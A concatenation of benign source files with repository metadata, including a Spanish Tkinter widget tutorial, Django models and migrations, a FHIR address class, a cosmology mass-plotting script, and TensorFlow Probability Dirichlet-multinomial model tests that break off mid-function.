s=new_marker_set('Sec6_Anch')
marker_sets["Sec6_Anch"]=s
s= marker_sets["Sec6_Anch"]
mark=s.place_marker((558, 299, 781), (0.84, 0.78, 0.24), 26.9335)
if "Sec8_GFPC" not in marker_sets:
s=new_marker_set('Sec8_GFPC')
marker_sets["Sec8_GFPC"]=s
s= marker_sets["Sec8_GFPC"]
mark=s.place_marker((428, 270, 711), (0.62, 0.67, 0.45), 31.586)
if "Sec8_Anch" not in marker_sets:
s=new_marker_set('Sec8_Anch')
marker_sets["Sec8_Anch"]=s
s= marker_sets["Sec8_Anch"]
mark=s.place_marker((877, 991, 805), (0.62, 0.47, 0.45), 26.9335)
if "Sec10_GFPN" not in marker_sets:
s=new_marker_set('Sec10_GFPN')
marker_sets["Sec10_GFPN"]=s
s= marker_sets["Sec10_GFPN"]
mark=s.place_marker((899, 576, 943), (0, 0.91, 0), 21.9005)
if "Sec10_GFPC" not in marker_sets:
s=new_marker_set('Sec10_GFPC')
marker_sets["Sec10_GFPC"]=s
s= marker_sets["Sec10_GFPC"]
mark=s.place_marker((671, 362, 423), (0, 0.91, 0), 31.586)
if "Sec10_Anch" not in marker_sets:
s=new_marker_set('Sec10_Anch')
marker_sets["Sec10_Anch"]=s
s= marker_sets["Sec10_Anch"]
mark=s.place_marker((699, 105, 883), (0, 0.71, 0), 26.9335)
if "Sec15_GFPN" not in marker_sets:
s=new_marker_set('Sec15_GFPN')
marker_sets["Sec15_GFPN"]=s
s= marker_sets["Sec15_GFPN"]
mark=s.place_marker((340, 501, 893), (0.11, 0.51, 0.86), 21.9005)
if "Sec15_GFPC" not in marker_sets:
s=new_marker_set('Sec15_GFPC')
marker_sets["Sec15_GFPC"]=s
s= marker_sets["Sec15_GFPC"]
mark=s.place_marker((964, 729, 337), (0.11, 0.51, 0.86), 31.586)
if "Sec15_Anch" not in marker_sets:
s=new_marker_set('Sec15_Anch')
marker_sets["Sec15_Anch"]=s
s= marker_sets["Sec15_Anch"]
mark=s.place_marker((486, 503, 223), (0.11, 0.31, 0.86), 26.9335)
if "Exo70_GFPN" not in marker_sets:
s=new_marker_set('Exo70_GFPN')
marker_sets["Exo70_GFPN"]=s
s= marker_sets["Exo70_GFPN"]
mark=s.place_marker((472, 868, 488), (0.89, 0.47, 0.4), 21.9005)
if "Exo70_GFPC" not in marker_sets:
s=new_marker_set('Exo70_GFPC')
marker_sets["Exo70_GFPC"]=s
s= marker_sets["Exo70_GFPC"]
mark=s.place_marker((333, 100, 187), (0.89, 0.47, 0.4), 31.586)
if "Exo70_Anch" not in marker_sets:
s=new_marker_set('Exo70_Anch')
marker_sets["Exo70_Anch"]=s
s= marker_sets["Exo70_Anch"]
mark=s.place_marker((147, 620, 939), (0.89, 0.27, 0.4), 26.9335)
if "Exo84_GFPN" not in marker_sets:
s=new_marker_set('Exo84_GFPN')
marker_sets["Exo84_GFPN"]=s
s= marker_sets["Exo84_GFPN"]
mark=s.place_marker((573, 301, 997), (0.5, 0.7, 0), 31.586)
if "Exo84_GFPC" not in marker_sets:
s=new_marker_set('Exo84_GFPC')
marker_sets["Exo84_GFPC"]=s
s= marker_sets["Exo84_GFPC"]
mark=s.place_marker((585, 771, 647), (0.5, 0.7, 0), 31.586)
if "Exo84_Anch" not in marker_sets:
s=new_marker_set('Exo84_Anch')
marker_sets["Exo84_Anch"]=s
s= marker_sets["Exo84_Anch"]
mark=s.place_marker((183, 347, 23), (0.5, 0.5, 0), 26.9335)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
|
[
"batxes@gmail.com"
] |
batxes@gmail.com
|
3df1683b6df43174ed1afbeaa388ebae959d45e0
|
0f0451c1c3e379bb4bdd13af1a1f278a13885c45
|
/Tkinter/ModuloTkk.py
|
e6b7cfbc63a2f0b3245414cee23762ea899698eb
|
[] |
no_license
|
Nataliodg/Python
|
1b860aae5135d9a5d34ca14f74f656adb8e76b11
|
59b66f1f67151eb5c3deec90249077c55291206a
|
refs/heads/main
| 2023-01-07T11:24:45.420199
| 2020-11-14T02:09:02
| 2020-11-14T02:09:02
| 312,727,510
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,054
|
py
|
#Tk hemos dicho que es una biblioteca de controles visuales que los podemos acceder desde Python y desde otros lenguajes de programación.
#En la versión Tk 8.5 sumó una nueva serie de controles visuales ( Notebook, Combobox etc.) y modernizó los que hemos visto en los conceptos anteriores.
# Para hacer uso de esta nueva versión de la biblioteca en Python se implementó un nuevo módulo y se lo agregó al paquete tkinter.
# Para hacer uso de este conjunto de Widget (controles visuales) debemos importar el paquete ttk.
# Todo lo que conocemos hasta ahora de los controles visuales del módulo tkinter funciona prácticamente sin cambios, lo que deberemos hacer es crear objetos de la clase Button, Entry etc. recuperándolos ahora del módulo tkinter.ttk
#1)
#Mostrar una ventana y en su interior dos botones y una label utilizando el módulo ttk. La label muestra inicialmente el valor 1.
# Cada uno de los botones permiten incrementar o decrementar en uno el contenido de la label
import tkinter as tk
from tkinter import ttk
class Aplicacion:
def __init__(self):
self.valor=1
self.ventana1=tk.Tk()
self.ventana1.title("Controles Button y Label")
self.label1=ttk.Label(self.ventana1, text=self.valor)
self.label1.grid(column=0, row=0)
self.label1.configure(foreground="red")
self.boton1=ttk.Button(self.ventana1, text="Incrementar", command=self.incrementar)
self.boton1.grid(column=0, row=1)
self.boton2=ttk.Button(self.ventana1, text="Decrementar", command=self.decrementar)
self.boton2.grid(column=0, row=2)
self.ventana1.mainloop()
def incrementar(self):
self.valor=self.valor+1
self.label1.config(text=self.valor)
def decrementar(self):
self.valor=self.valor-1
self.label1.config(text=self.valor)
# aplicacion1=Aplicacion()
#*****************************************************************
#2)
#Ingresar el nombre de usuario y clave en controles de tipo Entry.
# Si se ingresa las cadena (usuario: juan, clave="abc123") luego mostrar en el título de la ventana el mensaje "Correcto" en caso contrario mostrar el mensaje "Incorrecto".
# Utilizar Widget del módulo ttk.
class Aplicacion2:
def __init__(self):
self.ventana1=tk.Tk()
self.label1=ttk.Label(text="Ingrese nombre de usuario:")
self.label1.grid(column=0, row=0)
self.dato1=tk.StringVar()
self.entry1=ttk.Entry(self.ventana1, width=30, textvariable=self.dato1)
self.entry1.grid(column=1, row=0)
self.label2=ttk.Label(text="Ingrese clave:")
self.label2.grid(column=0, row=1)
self.dato2=tk.StringVar()
self.entry2=ttk.Entry(self.ventana1, width=30, textvariable=self.dato2, show="*")
self.entry2.grid(column=1, row=1)
self.boton1=ttk.Button(self.ventana1, text="Ingresar", command=self.ingresar)
self.boton1.grid(column=1, row=2)
self.ventana1.mainloop()
def ingresar(self):
if self.dato1.get()=="juan" and self.dato2.get()=="abc123":
self.ventana1.title("Correcto")
else:
self.ventana1.title("Incorrecto")
# aplicacion1=Aplicacion2()
#***************************************************************
#3)
#Mostrar dos controles de tipo Radiobutton con las etiquetas "Varón" y "Mujer",
# cuando se presione un botón actualizar una Label con el Radiobutton seleccionado.
class Aplicacion3:
def __init__(self):
self.ventana1=tk.Tk()
self.seleccion=tk.IntVar()
self.seleccion.set(2)
self.radio1=ttk.Radiobutton(self.ventana1,text="Varon", variable=self.seleccion, value=1)
self.radio1.grid(column=0, row=0)
self.radio2=ttk.Radiobutton(self.ventana1,text="Mujer", variable=self.seleccion, value=2)
self.radio2.grid(column=0, row=1)
self.boton1=ttk.Button(self.ventana1, text="Mostrar seleccionado", command=self.mostrarseleccionado)
self.boton1.grid(column=0, row=2)
self.label1=ttk.Label(text="opcion seleccionada")
self.label1.grid(column=0, row=3)
self.ventana1.mainloop()
def mostrarseleccionado(self):
if self.seleccion.get()==1:
self.label1.configure(text="opcion seleccionada=Varon")
if self.seleccion.get()==2:
self.label1.configure(text="opcion seleccionada=Mujer")
# aplicacion1=Aplicacion3()
#****************************************************************
#4)
#Mostrar una ventana y en su interior tres controles de tipo Checkbutton cuyas etiquetas correspondan a distintos lenguajes de programación.
# Cuando se presione un botón mostrar en una Label la cantidad de Checkbutton que se encuentran chequeados.
# Utilizar Widget del módulo ttk.
class Aplicacion4:
def __init__(self):
self.ventana1=tk.Tk()
self.seleccion1=tk.IntVar()
self.check1=ttk.Checkbutton(self.ventana1,text="Python", variable=self.seleccion1)
self.check1.grid(column=0, row=0)
self.seleccion2=tk.IntVar()
self.check2=ttk.Checkbutton(self.ventana1,text="C++", variable=self.seleccion2)
self.check2.grid(column=0, row=1)
self.seleccion3=tk.IntVar()
self.check3=ttk.Checkbutton(self.ventana1,text="Java", variable=self.seleccion3)
self.check3.grid(column=0, row=2)
self.boton1=ttk.Button(self.ventana1, text="Verificar", command=self.verificar)
self.boton1.grid(column=0, row=4)
self.label1=ttk.Label(text="cantidad:")
self.label1.grid(column=0, row=5)
self.ventana1.mainloop()
def verificar(self):
cant=0
if self.seleccion1.get()==1:
cant+=1
if self.seleccion2.get()==1:
cant+=1
if self.seleccion3.get()==1:
cant+=1
self.label1.configure(text="cantidad:"+str(cant))
# aplicacion1=Aplicacion4()
#*****************************************************************
#5)
#Disponer un Listbox con una serie de nombres de frutas.
# Permitir la selección solo de uno de ellos.
# Cuando se presione un botón recuperar la fruta seleccionada y mostrarla en una Label.
class Aplicacion5:
def __init__(self):
self.ventana1=tk.Tk()
self.listbox1=tk.Listbox(self.ventana1)
self.listbox1.grid(column=0,row=0)
self.listbox1.insert(0,"papa")
self.listbox1.insert(1,"manzana")
self.listbox1.insert(2,"pera")
self.listbox1.insert(3,"sandia")
self.listbox1.insert(4,"naranja")
self.listbox1.insert(5,"melon")
self.boton1=ttk.Button(self.ventana1, text="Recuperar", command=self.recuperar)
self.boton1.grid(column=0, row=1)
self.label1=ttk.Label(text="Seleccionado:")
self.label1.grid(column=0, row=2)
self.ventana1.mainloop()
def recuperar(self):
if len(self.listbox1.curselection())!=0:
self.label1.configure(text=self.listbox1.get(self.listbox1.curselection()[0]))
aplicacion1=Aplicacion5()
|
[
"natadg@outlook.com"
] |
natadg@outlook.com
|
9fe14f76ed7f167080c56d6ae5377451ea028db9
|
607241e619ca499121106b218a5e00ac5244bda3
|
/analysis/zeldovich_enzo_mass.py
|
808a1269774d71bef4bd037a05e3c33e5614d2a5
|
[] |
no_license
|
bvillasen/cosmo_sims
|
37caea950c7be0626a5170333bfe734071c58124
|
8b20dc05842a22ea50ceb3d646037d2e66fc8c9b
|
refs/heads/master
| 2020-04-22T23:22:28.670894
| 2020-01-02T23:32:39
| 2020-01-02T23:32:39
| 114,167,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,713
|
py
|
import sys
import numpy as np
import matplotlib.pyplot as plt
import h5py as h5
import yt
dev_dir = '/home/bruno/Desktop/Dropbox/Developer/'
cosmo_dir = dev_dir + 'cosmo_sims/'
toolsDirectory = cosmo_dir + "tools/"
sys.path.extend([toolsDirectory ] )
from load_data_cholla import load_snapshot_data
from internal_energy import get_internal_energy, get_temp, get_Temperaure_From_Flags_DE
# from load_data_enzo import load_snapshot_enzo
from cosmo_constants import *
from tools import create_directory
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
nSnap = rank
# rank = 0
dataDir = '/raid/bruno/data/'
# dataDir = '/home/bruno/Desktop/data/'
data_set = 'enzo_simple_beta_convDE'
startSnap = 27
enzoDir = dataDir + 'cosmo_sims/enzo/ZeldovichPancake_HLLC/'
outDir = dev_dir + 'figures/zeldovich_mass/'
if rank == 0:
create_directory( outDir )
a_list = []
gamma = 5./3
j_indx = 0
i_indx = 0
L = 64.
n = 256
dx = L / ( n )
x = np.arange(0, 256, 1)* dx + 0.5*dx
dv = (dx*1e3)**3
chollaDir_0 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PLMC_HLLC_VL_eta0.001_0.030_z1/'
chollaDir_1 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PLMP_HLLC_VL_eta0.001_0.030_z1/'
chollaDir_2 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMC_HLLC_VL_eta0.001_0.030_z1_ic0/'
chollaDir_3 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic64/'
chollaDir_4 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic32/'
chollaDir_5 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic4/'
chollaDir_6 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic0/'
# chollaDir_3 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMC_HLLC_VL_eta0.001_0.030_z1_signStone/'
dir_list = [ chollaDir_0, chollaDir_1, chollaDir_2, chollaDir_3, chollaDir_4, chollaDir_5, chollaDir_6 ]
labels = ['PLMC', 'PLMP', 'PPMC_ic0', 'PPMP_ic64', 'PPMP_ic32', 'PPMP_ic4', 'PPMP_ic0', ]
out_file_name = 'zeldovich_mass.png'
#Plot UVB uvb_rates
nrows=1
ncols = 1
fig, ax = plt.subplots(nrows=nrows, ncols=ncols, figsize=(10*ncols,8*nrows))
lw = 3
for i,chollaDir in enumerate(dir_list):
print chollaDir
mass = []
z = []
for nSnap in range(50):
data_cholla = load_snapshot_data( nSnap, chollaDir )
current_z = data_cholla['current_z']
dens_ch = data_cholla['gas']['density'][...]
mass_tot = dens_ch.sum() / dv
z.append(current_z)
mass.append( mass_tot )
# print mass
ax.plot( z, mass, label=labels[i] )
ax.legend()
ax.set_xlabel('Redshift')
ax.set_ylabel(r'Mass [$\mathrm{M}_{\odot}/h$ ]')
fig.savefig( outDir+out_file_name, bbox_inches='tight', dpi=100)
|
[
"bvillasen@gmail.com"
] |
bvillasen@gmail.com
|
f1b5e70d317865f9e1d39f6a0a2dc9db7d644297
|
7dc0d691734741233d94eab627a22087b6b08830
|
/dashboard/admin.py
|
618045ac9077cee68fb6e2f74e2bda11add3ffc0
|
[] |
no_license
|
IshSiva/Paper-Pro
|
0aeea869fe5b7c773173c5fbfc41d9109e1ef55c
|
af85ba3490a92ae0300fa1873524aa9a93604265
|
refs/heads/master
| 2022-11-20T09:08:40.553150
| 2020-07-19T06:18:05
| 2020-07-19T06:18:05
| 280,803,215
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 116
|
py
|
from django.contrib import admin
from .models import Paper
admin.site.register(Paper)
# Register your models here.
|
[
"ish23.siva@gmail.com"
] |
ish23.siva@gmail.com
|
0bf604d36670b6e71f496a6857745f8d1f01a1bc
|
a316f5ad014ff2dfb0d75bc4e227129eb441aa17
|
/portal/models/address.py
|
7bea7538eace9892166659354088dd9d9884e4ff
|
[
"BSD-3-Clause"
] |
permissive
|
jmillr/true_nth_usa_portal
|
d39fbd3abfc850a92fe84b27981372358ffc7742
|
c756147b24cbc6988ac61c601491e4604074c3a7
|
refs/heads/master
| 2021-07-05T11:34:19.424564
| 2017-09-01T00:16:40
| 2017-09-01T00:16:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,384
|
py
|
"""Address module
Address data lives in the 'addresses' table. Several entities link
to address via foreign keys.
"""
from ..database import db
from sqlalchemy.dialects.postgresql import ENUM
address_type = ENUM('postal', 'physical', 'both', name='address_type',
create_type=False)
address_use = ENUM('home', 'work', 'temp', 'old', name='address_use',
create_type=False)
class Address(db.Model):
"""SQLAlchemy class for `addresses` table"""
__tablename__ = 'addresses'
id = db.Column(db.Integer(), primary_key=True)
use = db.Column('a_use', address_use)
type = db.Column('a_type', address_type)
line1 = db.Column(db.Text)
line2 = db.Column(db.Text)
line3 = db.Column(db.Text)
city = db.Column(db.Text)
district = db.Column(db.Text)
state = db.Column(db.Text)
postalCode = db.Column(db.Text)
country = db.Column(db.Text)
@property
def lines(self):
return '; '.join([el for el in self.line1, self.line2, self.line3 if
el])
def __str__(self):
return "Address: {0.use} {0.type} {0.lines} {0.city} {0.district}"\
" {0.state} {0.postalCode} {0.country}".format(self)
@classmethod
def from_fhir(cls, data):
adr = cls()
if 'line' in data:
for i, line in zip(range(1, len(data['line']) + 1), data['line']):
# in case of 4 or more lines, delimit and append to line3
if i > 3:
adr.line3 = '; '.join((adr.line3, line))
else:
setattr(adr, 'line{}'.format(i), line)
for attr in ('use', 'type'):
if attr in data:
setattr(adr, attr, data[attr].lower())
for attr in ('city', 'district', 'state', 'postalCode', 'country'):
if attr in data:
setattr(adr, attr, data[attr])
return adr
def as_fhir(self):
d = {}
d['use'] = self.use
d['type'] = self.type
lines = []
for el in self.line1, self.line2, self.line3:
if el:
lines.append(el)
d['line'] = lines
for attr in ('city', 'district', 'state', 'postalCode', 'country'):
value = getattr(self, attr, None)
if value:
d[attr] = value
return d
|
[
"pbugni@u.washington.edu"
] |
pbugni@u.washington.edu
|
44c3626a05812bdb86c0889e2b76950d61f74b14
|
387b6a8dfc1cbaff159edbf5bf189efbb3532220
|
/apps/awards/migrations/0005_auto_20200112_1930.py
|
710a5aca670054b8d91134722f434995ddd00d9b
|
[] |
no_license
|
jhurtadojerves/characters
|
68d9417704c9828cb3ac93ed2dce90b8608a41d4
|
c0702ef56890381801de67341e0333fb1060d08d
|
refs/heads/master
| 2022-06-21T20:28:20.270598
| 2022-06-09T14:04:10
| 2022-06-09T14:04:10
| 207,205,432
| 0
| 0
| null | 2020-02-13T15:42:50
| 2019-09-09T02:14:26
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,742
|
py
|
# Generated by Django 3.0 on 2020-01-12 19:30
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
("characters", "0013_auto_20190913_0939"),
("awards", "0004_category_award"),
]
operations = [
migrations.AddField(
model_name="accesstoken",
name="token",
field=models.UUIDField(default=uuid.uuid4, editable=False, unique=True),
),
migrations.AddField(
model_name="category",
name="participants",
field=models.ManyToManyField(
related_name="categories", to="characters.Character"
),
),
migrations.AddField(
model_name="voting",
name="category",
field=models.ForeignKey(
default=1,
on_delete=django.db.models.deletion.PROTECT,
related_name="votes",
to="awards.Category",
),
preserve_default=False,
),
migrations.AddField(
model_name="voting",
name="selected_option",
field=models.ForeignKey(
default=1,
on_delete=django.db.models.deletion.PROTECT,
to="characters.Character",
),
preserve_default=False,
),
migrations.AddField(
model_name="voting",
name="user",
field=models.ForeignKey(
default=1,
on_delete=django.db.models.deletion.PROTECT,
to="awards.AccessToken",
),
preserve_default=False,
),
]
|
[
"juliohurtado@MacBook-Pro-de-Julio.local"
] |
juliohurtado@MacBook-Pro-de-Julio.local
|
095a75dc9f76da69b03dfe60e9f876793bbe6e88
|
8442bfdedfc18680be49aa77b976ed2732a13d7d
|
/The_Python_Book/Python_Essentials/scope.py
|
bff7ee120c0cc79d80c5fd3cfcb22d9706912ce8
|
[] |
no_license
|
huegli/Learning_Python
|
d61a236f85675ae194448bb81ff811708c926dc5
|
88565e623a3b978ce257ea2ea44dd0cfa672fe1b
|
refs/heads/master
| 2020-04-12T01:42:05.388424
| 2018-10-09T00:04:12
| 2018-10-09T00:04:12
| 48,859,809
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 99
|
py
|
#!/usr/bin/env python2
cont = False
var = 0
if cont:
var = 1234
if var != 0:
print(var)
|
[
"nikolai.schlegel@gmail.com"
] |
nikolai.schlegel@gmail.com
|
87cea978ed76cf4c8c6ec4a24f6b08a2228227d4
|
5a856ce08fc5df2c13e069bc8e6ab2b88dc97e68
|
/programming/epost_zipcode_csv.py
|
ea0eb3e62ad13bbe44fa01086341fa3ac04e7d9e
|
[] |
no_license
|
bin7808/teacher6
|
b05f30b2ebd7cfb7b0b314832f0d56f192233a7e
|
bcc08136101979162ff738616fb9eabfd8b757b9
|
refs/heads/master
| 2021-01-09T06:05:04.862399
| 2016-08-12T07:41:40
| 2016-08-12T07:41:40
| 65,533,093
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 763
|
py
|
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "programming.settings")
import django
django.setup()
import csv
CSV_PATH = '20150710_seoul.txt'
reader = csv.reader(open(CSV_PATH, 'rt', encoding='cp949'), delimiter='|')
from blog.models import ZipCode
columns = next(reader)
zip_code_list = []
for idx, row in enumerate(reader):
data = dict(zip(columns, row))
zip_code = ZipCode(
city=data['시도'], road=data['도로명'], dong=data['법정동명'],
gu=data['시군구'], code=data['우편번호'])
zip_code_list.append(zip_code)
# zip_code.save()
# print(data['우편번호'])
# if idx > 10: break
print('zip_code size : {}'.format(len(zip_code_list)))
ZipCode.objects.bulk_create(zip_code_list, 100)
|
[
"bin7808@gmail.com"
] |
bin7808@gmail.com
|
def370a2502681e80a7c73419b1dd663c09f1d72
|
f41e861a9e4fef4606753de92ed6098ae2f8337e
|
/tests/tests_during_development/no_edward_tests.py
|
2eb4df8ddc73dd57faebd73227a86923bc9ec034
|
[
"BSD-3-Clause"
] |
permissive
|
jpimentabernardes/scCODA
|
cb1910a1fc3339286784a3772f6a51b148f8c240
|
db610c1bda904f79a8142da767cf8e62d1cd8d32
|
refs/heads/master
| 2023-02-16T05:38:10.006874
| 2020-12-08T11:08:16
| 2020-12-08T11:08:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,887
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import importlib
import pandas as pd
from tensorflow_probability.python.experimental import edward2 as ed
from scdcdm.util import result_classes as res
from scdcdm.model import dirichlet_models as mod
from scdcdm.util import comp_ana as ca
tfd = tfp.distributions
tfb = tfp.bijectors
pd.set_option('display.max_columns', 500)
#%%
# Testing
from scdcdm.util import data_generation as gen
n = 5
cases = 1
K = 5
n_samples = [n, n]
n_total = np.full(shape=[2*n], fill_value=1000)
data = gen.generate_case_control(cases, K, n_total[0], n_samples,
w_true=np.array([[1, 0, 0, 0, 0]]),
b_true=np.log(np.repeat(0.2, K)).tolist())
x = data.obs.values
y = data.X
print(x)
print(y)
#%%
importlib.reload(mod)
importlib.reload(res)
import patsy as pt
cell_types = data.var.index.to_list()
formula = "x_0"
# Get count data
data_matrix = data.X.astype("float32")
# Build covariate matrix from R-like formula
covariate_matrix = pt.dmatrix(formula, data.obs)
covariate_names = covariate_matrix.design_info.column_names[1:]
covariate_matrix = covariate_matrix[:, 1:]
model = mod.NoBaselineModelNoEdward(covariate_matrix=np.array(covariate_matrix), data_matrix=data_matrix,
cell_types=cell_types, covariate_names=covariate_names, formula=formula)
print(model.target_log_prob_fn(model.params["mu_b"], model.params["sigma_b"], model.params["b_offset"], model.params["ind_raw"], model.params["alpha"]))
#%%
result = model.sample_hmc(num_results=int(1000), n_burnin=500)
result.summary()
#%%
model_2 = ca.CompositionalAnalysis(data, "x_0", baseline_index=None)
print(model_2.target_log_prob_fn(model_2.params[0], model_2.params[1], model_2.params[2], model_2.params[3], model_2.params[4]))
#%%
res_2 = model_2.sample_hmc(num_results=int(1000), n_burnin=500)
res_2.summary()
#%%
D = x.shape[1]
K = y.shape[1]
N = y.shape[0]
dtype = tf.float32
beta_size = [D, K]
alpha_size = [1, K]
#tf.random.set_seed(5678)
test_model = tfd.JointDistributionSequential([
tfd.Independent(
tfd.Normal(loc=tf.zeros(1, dtype=dtype),
scale=tf.ones(1, dtype=dtype),
name="mu_b"),
reinterpreted_batch_ndims=1),
tfd.Independent(
tfd.HalfCauchy(tf.zeros(1, dtype=dtype),
tf.ones(1, dtype=dtype),
name="sigma_b"),
reinterpreted_batch_ndims=1),
tfd.Independent(
tfd.Normal(
loc=tf.zeros([D, K], dtype=dtype),
scale=tf.ones([D, K], dtype=dtype),
name="b_offset"),
reinterpreted_batch_ndims=2),
lambda b_offset, sigma_b, mu_b: tfd.Independent(
tfd.Deterministic(
loc=mu_b + sigma_b * b_offset,
name="b_raw"
),
reinterpreted_batch_ndims=2),
# Spike-and-slab
tfd.Independent(
1 / (1 + tf.exp(tfd.Normal(
loc=tf.zeros(shape=[D, K], dtype=dtype),
scale=tf.ones(shape=[D, K], dtype=dtype)*50))),
name="ind"
,
reinterpreted_batch_ndims=2),
# Betas
lambda ind, b_raw: tfd.Independent(
tfd.Deterministic(
loc=ind*b_raw,
name="beta"
),
reinterpreted_batch_ndims=2),
tfd.Independent(
tfd.Normal(
loc=tf.zeros(alpha_size),
scale=tf.ones(alpha_size) * 5,
name="alpha"),
reinterpreted_batch_ndims=2),
# concentration
lambda alpha, beta: tfd.Independent(
tfd.Deterministic(
loc=tf.exp(alpha + tf.matmul(tf.cast(x, dtype), beta)),
name="concentration"
),
reinterpreted_batch_ndims=2),
# Cell count prediction via DirMult
lambda concentration_: tfd.Independent(
tfd.DirichletMultinomial(
total_count=tf.cast(n_total, dtype),
concentration=concentration_,
name="predictions"),
reinterpreted_batch_ndims=1),
])
#%%
init_mu_b = tf.zeros(1, name="init_mu_b", dtype=dtype)
init_sigma_b = tf.ones(1, name="init_sigma_b", dtype=dtype)
init_b_offset = tf.zeros(beta_size, name="init_b_offset", dtype=dtype)
#init_b_offset = tf.random.normal(beta_size, 0, 1, name='init_b_offset', dtype=dtype)
init_ind = tf.ones(beta_size, name='init_ind', dtype=dtype)*0.5
init_ind_raw = tf.zeros(beta_size, name="init_ind_raw")
init_alpha = tf.zeros(alpha_size, name="init_alpha", dtype=dtype)
#init_alpha = tf.random.normal(alpha_size, 0, 1, name='init_alpha', dtype=dtype)
init_b_raw = init_mu_b + init_sigma_b * init_b_offset
init_beta = init_ind * init_b_raw
init_conc = tf.exp(init_alpha + tf.matmul(tf.cast(x, dtype), init_beta))
init_pred = tf.cast(y, dtype)
params_lp = [init_mu_b,
init_sigma_b,
init_b_offset,
init_b_raw,
init_ind,
init_beta,
init_alpha,
init_conc,
init_pred
]
params = [init_mu_b,
init_sigma_b,
init_b_offset,
#init_b_raw,
init_ind,
#init_beta,
init_alpha,
#init_conc,
#init_pred
]
#%%
test_sam = test_model.sample()
print(test_sam)
print(test_model.log_prob(params_lp))
print(test_model.resolve_graph())
print(test_model.variables)
#%%
test_model_2 = tfd.JointDistributionSequential([
tfd.Independent(
tfd.Normal(loc=tf.zeros(1, dtype=dtype),
scale=tf.ones(1, dtype=dtype),
name="mu_b"),
reinterpreted_batch_ndims=1),
tfd.Independent(
tfd.HalfCauchy(tf.zeros(1, dtype=dtype),
tf.ones(1, dtype=dtype),
name="sigma_b"),
reinterpreted_batch_ndims=1),
tfd.Independent(
tfd.Normal(
loc=tf.zeros([D, K], dtype=dtype),
scale=tf.ones([D, K], dtype=dtype),
name="b_offset"),
reinterpreted_batch_ndims=2),
# Spike-and-slab
tfd.Independent(
tfd.Normal(
loc=tf.zeros(shape=[D, K], dtype=dtype),
scale=tf.ones(shape=[D, K], dtype=dtype)*50,
name='ind_raw'),
reinterpreted_batch_ndims=2),
tfd.Independent(
tfd.Normal(
loc=tf.zeros(alpha_size),
scale=tf.ones(alpha_size) * 5,
name="alpha"),
reinterpreted_batch_ndims=2),
# Cell count prediction via DirMult
lambda alpha, ind_raw, b_offset, sigma_b, mu_b: tfd.Independent(
tfd.DirichletMultinomial(
total_count=tf.cast(n_total, dtype),
concentration=tf.exp(alpha
+ tf.matmul(tf.cast(x, dtype),
(1 / (1 + tf.exp(-ind_raw)))
* (mu_b + sigma_b * b_offset)
)),
name="predictions"),
reinterpreted_batch_ndims=1),
])
params_2 = [init_mu_b,
init_sigma_b,
init_b_offset,
init_ind_raw,
init_alpha,
init_pred
]
params_small = [init_mu_b,
init_sigma_b,
init_b_offset,
init_ind_raw,
init_alpha,
# init_pred
]
#%%
test_sam_2 = test_model_2.sample()
#print(test_sam_2)
print(test_model_2.log_prob(params_2))
print(test_model_2.resolve_graph())
print(test_model_2.log_prob_parts(params_2))
#%%
def target_log_prob_fn_small(mu_b_, sigma_b_, b_offset_, ind_, alpha_):
return test_model_2.log_prob((mu_b_, sigma_b_, b_offset_, ind_, alpha_, tf.cast(y, dtype)))
num_results = 10000
num_burnin_steps = 5000
step_size = 0.01
num_leapfrog_steps = 10
constraining_bijectors = [
tfb.Identity(),
tfb.Identity(),
tfb.Identity(),
tfb.Identity(),
tfb.Identity(),
]
hmc_kernel = tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn_small,
step_size=step_size,
num_leapfrog_steps=num_leapfrog_steps)
hmc_kernel = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=hmc_kernel, bijector=constraining_bijectors)
hmc_kernel = tfp.mcmc.SimpleStepSizeAdaptation(
inner_kernel=hmc_kernel, num_adaptation_steps=int(4000), target_accept_prob=0.9)
@tf.function
def do_sampling_small():
return tfp.mcmc.sample_chain(
num_results=num_results,
num_burnin_steps=num_burnin_steps,
current_state=params_small,
kernel=hmc_kernel)
states_small, kernel_results_small = do_sampling_small()
#%%
print(states_small)
#%%
def log_joint_old(y, alpha_, mu_b_, sigma_b_, b_offset_, ind_):
rv_alpha = tfd.Normal(
loc=tf.zeros(alpha_size),
scale=tf.ones(alpha_size) * 5,
name="alpha")
rv_mu_b = tfd.Normal(loc=tf.zeros(1, dtype=dtype),
scale=tf.ones(1, dtype=dtype),
name="mu_b")
rv_sigma_b = tfd.HalfCauchy(tf.zeros(1, dtype=dtype),
tf.ones(1, dtype=dtype),
name="sigma_b")
rv_b_offset = tfd.Normal(
loc=tf.zeros([D, K], dtype=dtype),
scale=tf.ones([D, K], dtype=dtype),
name="b_offset")
rv_ind = tfd.LogitNormal(
loc=tf.zeros(shape=[D, K], dtype=dtype),
scale=tf.ones(shape=[D, K], dtype=dtype)*50,
name='ind')
beta_raw_ = mu_b_ + sigma_b_ * b_offset_
